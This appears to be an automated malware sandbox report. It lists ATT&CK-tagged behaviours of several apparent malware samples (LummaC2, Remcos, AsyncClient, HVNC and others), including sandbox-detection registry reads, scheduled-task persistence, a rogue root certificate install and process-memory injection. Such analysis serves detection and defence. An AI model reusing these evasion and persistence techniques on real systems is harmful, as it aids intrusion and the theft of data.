Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 7 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
5432	5148	WerFault.exe	105
5804	4112	WerFault.exe	191
2664	4112	WerFault.exe	191
1904	6032	WerFault.exe	213
2780	908	WerFault.exe	288
5624	5752	WerFault.exe	461
5544	3544	WerFault.exe	643

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.exe1937516595.execmd.exetasklist.exewow.exesysnldcvmr.exeregsvr32.exeDiscord.exe5gevcp8z.tmppowershell.execmd.exeInstallUtil.exenpp.execmd.exeExtremeInjector.execmd.exeopengl32.dll40watson-sanchez4040830.exeschtasks.execmd.exeNBYS%20ASM.NET.exefindstr.execmd.exeJavvvum.exeOffnewhere.exeGxtuum.exe4363463463464363463463463.exekp8dnpa9.exetasklist.exeLummaC2.exetimeout.exeSkySync.scr0b44ippu.exePlates.pifschtasks.exetimeout.exetimeout.exe1078713571.execmd.exeutility-inst.exepeinf.exechoice.exegagagggagagag.exezzzz1.exeAsyncClient.exetpeinf.execmd.exekp8dnpa9.exeGxtuum.exerundll32.exefindstr.exenetsh.exeClient_protected.execoreplugin.exefindstr.exeGIFT-INFO.lMG.exeserver.exepowershell.exespofrln.exeImposed.comregsvr32.exeGuidanceConnectors.exefindstr.exe3388728634.exeRegAsm.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1937516595.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wow.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysnldcvmr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Discord.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5gevcp8z.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InstallUtil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	npp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ExtremeInjector.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	opengl32.dll40watson-sanchez4040830.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NBYS%20ASM.NET.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Javvvum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Offnewhere.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kp8dnpa9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	LummaC2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SkySync.scr
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0b44ippu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Plates.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1078713571.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	utility-inst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	peinf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gagagggagagag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zzzz1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AsyncClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tpeinf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kp8dnpa9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Client_protected.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	coreplugin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GIFT-INFO.lMG.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spofrln.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Imposed.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GuidanceConnectors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3388728634.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Imposed.com

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Imposed.com
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Imposed.com
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Imposed.com

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Plates.pifSkySync.scrInstallUtil.exekldrgawdtjawd.exesvchost.exeMicrosoft.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Plates.pif
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	SkySync.scr
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	InstallUtil.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	kldrgawdtjawd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	kldrgawdtjawd.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Plates.pif
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	SkySync.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	InstallUtil.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Microsoft.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Microsoft.exe

Delays execution with timeout.exe 5 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	Process
236	timeout.exe
1428	timeout.exe
696	timeout.exe
2156	timeout.exe
4572	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

wmic.exe

pid	Process
1244	wmic.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exeMicrosoft.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Microsoft.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Microsoft.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description	flow	ioc
HTTP User-Agent header	283	Go-http-client/1.1

Modifies Control Panel 4 IoCs

evasion

Processes:

NoEscape.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Mouse	NoEscape.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Mouse\SwapMouseButtons = "1"	NoEscape.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Desktop	NoEscape.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Desktop\AutoColorization = "1"	NoEscape.exe

Modifies data under HKEY_USERS 15 IoCs

Processes:

LogonUI.exe

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "217"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe

Modifies registry class 4 IoCs

Processes:

file.exespofrln.exeOpenWith.exesvchost.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	file.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	spofrln.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3870231897-2573482396-1083937135-1000\{4CE34C8A-74DE-4C3D-ADC7-3D9A05968922}	svchost.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

GIFT-INFO.lMG.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	GIFT-INFO.lMG.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	GIFT-INFO.lMG.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
700	schtasks.exe
612	schtasks.exe
4512	schtasks.exe
1052	schtasks.exe
2556	schtasks.exe
3560	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

major.exemsedge.exemsedge.exemsedge.exeidentity_helper.exeHVNC1.exepowershell.exe1690630277.exe2026511412.exepowershell.exewinupsecvmgr.exepowershell.exemsedge.exePlates.pif

pid	Process
3572	major.exe
3572	major.exe
3572	major.exe
3572	major.exe
2212	msedge.exe
2212	msedge.exe
1232	msedge.exe
1232	msedge.exe
1420	msedge.exe
1420	msedge.exe
4460	identity_helper.exe
4460	identity_helper.exe
3580	HVNC1.exe
3580	HVNC1.exe
3580	HVNC1.exe
3580	HVNC1.exe
3580	HVNC1.exe
3580	HVNC1.exe
3580	HVNC1.exe
3580	HVNC1.exe
3580	HVNC1.exe
3580	HVNC1.exe
3580	HVNC1.exe
3580	HVNC1.exe
3580	HVNC1.exe
3580	HVNC1.exe
3580	HVNC1.exe
3580	HVNC1.exe
3580	HVNC1.exe
3580	HVNC1.exe
3580	HVNC1.exe
3580	HVNC1.exe
3580	HVNC1.exe
3580	HVNC1.exe
3580	HVNC1.exe
5476	powershell.exe
5476	powershell.exe
5476	powershell.exe
1088	1690630277.exe
1088	1690630277.exe
4188	2026511412.exe
4188	2026511412.exe
5740	powershell.exe
5740	powershell.exe
5740	powershell.exe
4188	2026511412.exe
4188	2026511412.exe
1336	winupsecvmgr.exe
1336	winupsecvmgr.exe
5904	powershell.exe
5904	powershell.exe
5904	powershell.exe
1336	winupsecvmgr.exe
1336	winupsecvmgr.exe
1336	winupsecvmgr.exe
1336	winupsecvmgr.exe
5716	msedge.exe
5716	msedge.exe
5716	msedge.exe
5716	msedge.exe
1488	Plates.pif
1488	Plates.pif
1488	Plates.pif
1488	Plates.pif

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

Processes:

rundll32.exe4363463463464363463463463.exeMicrosoft.exe

pid	Process
124	rundll32.exe
2908	4363463463464363463463463.exe
760	Microsoft.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

remcos.exe

pid	Process
2244	remcos.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

Processes:

msedge.exe

pid	Process
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

4363463463464363463463463.exeHVNC1.exepowershell.exe1690630277.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	2908	4363463463464363463463463.exe
Token: SeDebugPrivilege	3580	HVNC1.exe
Token: SeDebugPrivilege	3580	HVNC1.exe
Token: SeDebugPrivilege	5476	powershell.exe
Token: SeDebugPrivilege	1088	1690630277.exe
Token: SeDebugPrivilege	5740	powershell.exe
Token: SeIncreaseQuotaPrivilege	5740	powershell.exe
Token: SeSecurityPrivilege	5740	powershell.exe
Token: SeTakeOwnershipPrivilege	5740	powershell.exe
Token: SeLoadDriverPrivilege	5740	powershell.exe
Token: SeSystemProfilePrivilege	5740	powershell.exe
Token: SeSystemtimePrivilege	5740	powershell.exe
Token: SeProfSingleProcessPrivilege	5740	powershell.exe
Token: SeIncBasePriorityPrivilege	5740	powershell.exe
Token: SeCreatePagefilePrivilege	5740	powershell.exe
Token: SeBackupPrivilege	5740	powershell.exe
Token: SeRestorePrivilege	5740	powershell.exe
Token: SeShutdownPrivilege	5740	powershell.exe
Token: SeDebugPrivilege	5740	powershell.exe
Token: SeSystemEnvironmentPrivilege	5740	powershell.exe
Token: SeRemoteShutdownPrivilege	5740	powershell.exe
Token: SeUndockPrivilege	5740	powershell.exe
Token: SeManageVolumePrivilege	5740	powershell.exe
Token: 33	5740	powershell.exe
Token: 34	5740	powershell.exe
Token: 35	5740	powershell.exe
Token: 36	5740	powershell.exe
Token: SeIncreaseQuotaPrivilege	5740	powershell.exe
Token: SeSecurityPrivilege	5740	powershell.exe
Token: SeTakeOwnershipPrivilege	5740	powershell.exe
Token: SeLoadDriverPrivilege	5740	powershell.exe
Token: SeSystemProfilePrivilege	5740	powershell.exe
Token: SeSystemtimePrivilege	5740	powershell.exe
Token: SeProfSingleProcessPrivilege	5740	powershell.exe
Token: SeIncBasePriorityPrivilege	5740	powershell.exe
Token: SeCreatePagefilePrivilege	5740	powershell.exe
Token: SeBackupPrivilege	5740	powershell.exe
Token: SeRestorePrivilege	5740	powershell.exe
Token: SeShutdownPrivilege	5740	powershell.exe
Token: SeDebugPrivilege	5740	powershell.exe
Token: SeSystemEnvironmentPrivilege	5740	powershell.exe
Token: SeRemoteShutdownPrivilege	5740	powershell.exe
Token: SeUndockPrivilege	5740	powershell.exe
Token: SeManageVolumePrivilege	5740	powershell.exe
Token: 33	5740	powershell.exe
Token: 34	5740	powershell.exe
Token: 35	5740	powershell.exe
Token: 36	5740	powershell.exe
Token: SeIncreaseQuotaPrivilege	5740	powershell.exe
Token: SeSecurityPrivilege	5740	powershell.exe
Token: SeTakeOwnershipPrivilege	5740	powershell.exe
Token: SeLoadDriverPrivilege	5740	powershell.exe
Token: SeSystemProfilePrivilege	5740	powershell.exe
Token: SeSystemtimePrivilege	5740	powershell.exe
Token: SeProfSingleProcessPrivilege	5740	powershell.exe
Token: SeIncBasePriorityPrivilege	5740	powershell.exe
Token: SeCreatePagefilePrivilege	5740	powershell.exe
Token: SeBackupPrivilege	5740	powershell.exe
Token: SeRestorePrivilege	5740	powershell.exe
Token: SeShutdownPrivilege	5740	powershell.exe
Token: SeDebugPrivilege	5740	powershell.exe
Token: SeSystemEnvironmentPrivilege	5740	powershell.exe
Token: SeRemoteShutdownPrivilege	5740	powershell.exe
Token: SeUndockPrivilege	5740	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exePlates.pifevetbeta.exeaa.exe5gevcp8z.tmpSkySync.scrCultures.pifstail.tmpImposed.comClient.exe

pid	Process
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1488	Plates.pif
1488	Plates.pif
1488	Plates.pif
4392	evetbeta.exe
1556	aa.exe
3412	5gevcp8z.tmp
5160	SkySync.scr
5160	SkySync.scr
5160	SkySync.scr
5244	Cultures.pif
5244	Cultures.pif
5244	Cultures.pif
5068	stail.tmp
5268	Imposed.com
5268	Imposed.com
5268	Imposed.com
4112	Client.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe

Suspicious use of SendNotifyMessage 53 IoCs

Processes:

msedge.exePlates.pifevetbeta.exeaa.exeSkySync.scrCultures.pifImposed.comClient.exe

pid	Process
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1488	Plates.pif
1488	Plates.pif
1488	Plates.pif
4392	evetbeta.exe
1556	aa.exe
5160	SkySync.scr
5160	SkySync.scr
5160	SkySync.scr
5244	Cultures.pif
5244	Cultures.pif
5244	Cultures.pif
5268	Imposed.com
5268	Imposed.com
5268	Imposed.com
4112	Client.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1556	aa.exe
4112	Client.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

gagagggagagag.exeXClient.exefiler.exewinrar-x64-701ru.exeopengl32.dll40watson-sanchez4040830.exeOpenWith.exeClient.exeOpenWith.exeLogonUI.exe

pid	Process
4428	gagagggagagag.exe
5356	XClient.exe
3840	filer.exe
404	winrar-x64-701ru.exe
404	winrar-x64-701ru.exe
404	winrar-x64-701ru.exe
1072	opengl32.dll40watson-sanchez4040830.exe
1072	opengl32.dll40watson-sanchez4040830.exe
1072	opengl32.dll40watson-sanchez4040830.exe
1072	opengl32.dll40watson-sanchez4040830.exe
4468	OpenWith.exe
4112	Client.exe
3884	OpenWith.exe
2800	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4363463463464363463463463.exeworker.exefoggy-mountains.exemsedge.exe

description	pid	Process	procid_target
PID 2908 wrote to memory of 5660	2908	4363463463464363463463463.exe	78
PID 2908 wrote to memory of 5660	2908	4363463463464363463463463.exe	78
PID 2908 wrote to memory of 5660	2908	4363463463464363463463463.exe	78
PID 2908 wrote to memory of 5932	2908	4363463463464363463463463.exe	79
PID 2908 wrote to memory of 5932	2908	4363463463464363463463463.exe	79
PID 2908 wrote to memory of 5932	2908	4363463463464363463463463.exe	79
PID 2908 wrote to memory of 3332	2908	4363463463464363463463463.exe	80
PID 2908 wrote to memory of 3332	2908	4363463463464363463463463.exe	80
PID 3332 wrote to memory of 1396	3332	worker.exe	81
PID 3332 wrote to memory of 1396	3332	worker.exe	81
PID 2908 wrote to memory of 3572	2908	4363463463464363463463463.exe	82
PID 2908 wrote to memory of 3572	2908	4363463463464363463463463.exe	82
PID 2908 wrote to memory of 3580	2908	4363463463464363463463463.exe	87
PID 2908 wrote to memory of 3580	2908	4363463463464363463463463.exe	87
PID 5932 wrote to memory of 1232	5932	foggy-mountains.exe	88
PID 5932 wrote to memory of 1232	5932	foggy-mountains.exe	88
PID 1232 wrote to memory of 2700	1232	msedge.exe	89
PID 1232 wrote to memory of 2700	1232	msedge.exe	89
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
PID 1232 wrote to memory of 460	1232	msedge.exe	90
